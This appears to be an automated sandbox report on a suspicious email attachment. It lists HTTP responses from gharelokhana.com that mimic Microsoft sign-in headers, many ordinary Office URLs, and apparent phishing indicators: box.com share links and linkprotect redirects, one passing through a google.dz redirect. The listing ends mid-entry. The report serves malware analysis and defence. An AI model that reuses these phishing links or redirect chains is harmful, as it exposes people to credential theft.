            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:26:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 7d5f50b4-631d-4ba0-a1c4-cfb2c4428101x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:26:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 79999ed5-e2ba-41de-95a6-cf6723bb9e01x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:27:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: f66d5a13-7b57-49c0-8b00-f9467d6ea701x-ms-ests-server: 2.1.19492.3 - FRC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:27:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 06fbc155-3601-4999-ba2c-47be24db5800x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:27:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 6329a10d-3673-4587-8ed1-6c9c3cac6f01x-ms-ests-server: 2.1.19492.3 - SEC ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 07:27:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: dcda2ac7-519c-4c48-a94a-0335536e0b00x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.aadrm.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.aadrm.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.cortana.ai
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.microsoftstream.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.office.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.onedrive.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://api.scheduler.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://app.powerbi.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://augloop.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://augloop.office.com/v2
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://canary.designerapp.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fonts
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbar
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.entity.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cortana.ai
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cortana.ai/api
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://cr.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://d.docs.live.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://designerapp.azurewebsites.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://designerappservice.officeapps.live.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dev.cortana.ai
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://devnull.onenote.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://directory.services.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ecs.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://edge.skype.com/registrar/prod
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://edge.skype.com/rps
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://fujipharma.box.com/s/4x9v4qxcj0rgtoah4if5h4f4p9cwtz7n
            Source: SBO Catch up call pf.msgString found in binary or memory: https://fujipharma.box.com/s/a7tvuywnn5igwj1mrqx03mquos4hiec6
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://graph.windows.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://graph.windows.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ic3.teams.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://invites.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://lifecycle.office.com
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2f4x9v4qxcj0rgtoah4if5h4f
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2fa7tvuywnn5igwj1mrqx03mq
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffujipharma.box.com%2fs%2fpezxwn32zbr37fbrrrqh18g
            Source: SBO Catch up call pf.msg, ~WRS{C0DF673B-3183-4731-BD91-7280094AF956}.tmp.1.drString found in binary or memory: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPv
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.microsoftonline.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.microsoftonline.com/organizations
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.windows.local
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://make.powerautomate.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://management.azure.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://management.azure.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messagebroker.mobile.m365.svc.cloud.microsoft
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.action.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.engagement.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.lifecycle.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://messaging.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://mss.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://my.microsoftpersonalcontent.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ncus.contentsync.
